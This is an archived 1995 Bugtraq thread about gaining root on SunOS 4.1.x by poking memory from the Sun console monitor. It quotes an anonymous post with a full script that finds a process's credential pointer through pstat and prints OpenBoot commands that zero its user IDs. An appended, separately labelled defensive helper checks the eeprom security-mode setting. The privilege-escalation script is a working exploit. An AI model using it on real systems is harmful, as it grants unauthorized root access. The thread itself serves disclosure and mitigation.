Bugtraq mailing list archives
Re: Pointer to a process's credential structure?
From: fritchie () FreeNet MSP MN US (Scott Fritchie)
Date: Fri, 14 Apr 1995 13:47:26 -0500
On Fri, 14 Apr 1995 09:17:25 +0800, patrick () oes amdahl com (Patrick Horgan) said:
Browsing through some archived "bugtraq" messages I discovered a really nifty way to change the effective and real userid of any process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x). That particular hole is demonstrably exploitable under Solaris 2.3 (and I assume Solaris 2.4), except for one little problem....
ph> I'd have to think...we used to be able to do this via the prom
ph> debugger.

I'll attach the message I found browsing spy.org's Web server at the end of this one. It will probably be a good memory refresher. :-)

ph> We wouldn't have to know any address ahead of time, but
ph> could walk the kernel's tables in the debugger from the prom
ph> prompt.

I'd thought of that, too. More work, though -- SunOS 4's "pstat" is so kind to give almost the exact address needed.

ph> I'd hope everyone knows
ph> that physical security is important, and that if you don't have it
ph> you're in deep doo-doo.

You've got a point there. At St. Olaf, we've got our machines "protected" by the root password if you attempt to boot into single-user mode (and haven't really cared all that much if someone went to the trouble of bringing their own Sun-style-bootable drive), but finding out about the monitor attack was a cool (in a twisted sense) discovery. "eeprom security-mode=command (?)", here we come.

-Scott

---
Scott E. Lystig Fritchie, UNIX Systems Manager          Co-founder:
Academic Computing Center, St. Olaf College             Twin Cities Free-Net
1510 St. Olaf Ave., Northfield, MN 55057                Organizing Committee
fritchie () stolaf edu ... 507/646.3407                  (Minneapolis/St. Paul, MN)
"Activism is the killer app for the net." -- Steven Cherry <stc () panix com>

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

#!/bin/sh -
# From: an100188 () anon penet fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq () crimelab com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq () crimelab com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#   PID is the PID of the shell you wish to give root to.
#
# Description:
#   Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then
    cat - << EOF
Usage: $0 PID
    Where PID is the PID of the shell you want to give root to.
    Note - for csh the PID is stored in \$\$.
EOF
    exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should then see the following message:

Type 'go' to resume
ok

type the following at the 'ok' prompt:

b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
go

Notes:
  * On some sun keyboards the '<L1>' key is labeled 'Stop'.
  * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0
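Added example, not part of the original post or the script above: a small POSIX sh audit helper for the mitigation Scott reaches for, "eeprom security-mode=command". It classifies the text that "eeprom security-mode" prints (none/command/full are the real OpenBoot values), so it can be run against saved output from many hosts offline; the function names and the sample outputs are constructed here.

```shell
#!/bin/sh
# Audit helper (added example): does this Sun's OpenBoot monitor require a
# password before the 'ok' prompt will accept commands?  The attack in the
# thread needs an unlocked 'ok' prompt, so security-mode=none is the finding.

# classify_security_mode OUTPUT
#   OUTPUT is the text printed by "eeprom security-mode".
#   Prints one of: full, command, none, unknown
classify_security_mode() {
    mode=$(printf '%s\n' "$1" | sed -n 's/^security-mode=\(.*\)$/\1/p' | head -n 1)
    case "$mode" in
        full)    echo full ;;
        command) echo command ;;
        none)    echo none ;;
        *)       echo unknown ;;
    esac
}

# monitor_locked OUTPUT
#   Returns 0 when the monitor is password protected (command or full),
#   1 otherwise (none, or output we could not parse and so cannot trust).
monitor_locked() {
    case "$(classify_security_mode "$1")" in
        command|full) return 0 ;;
        *)            return 1 ;;
    esac
}

# Constructed sample outputs, in the one-variable format eeprom prints.
SAMPLE_NONE='security-mode=none'
SAMPLE_COMMAND='security-mode=command'

# Live mode on an actual Sun host: ./audit.sh --live
if [ "${1:-}" = "--live" ]; then
    if monitor_locked "$(eeprom security-mode 2>/dev/null)"; then
        echo "ok: console monitor is password protected"
    else
        echo "WARNING: console monitor is open (security-mode is not command/full)"
    fi
fi
```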
Current thread:
- Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 12)
- Re: Pointer to a process's credential structure? John F. Haugh II (Apr 16)
- Re: Pointer to a process's credential structure? John C. Orthoefer (Apr 16)
- Re: Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 17)
- Welcome to bugtraq Majordomo () fc net (Apr 20)
- <Possible follow-ups>
- Re: Pointer to a process's credential structure? Patrick Horgan (Apr 13)
- Re: Pointer to a process's credential structure? Scott Fritchie (Apr 14)
- Re: Pointer to a process's credential structure? Frank Byrum (Apr 14)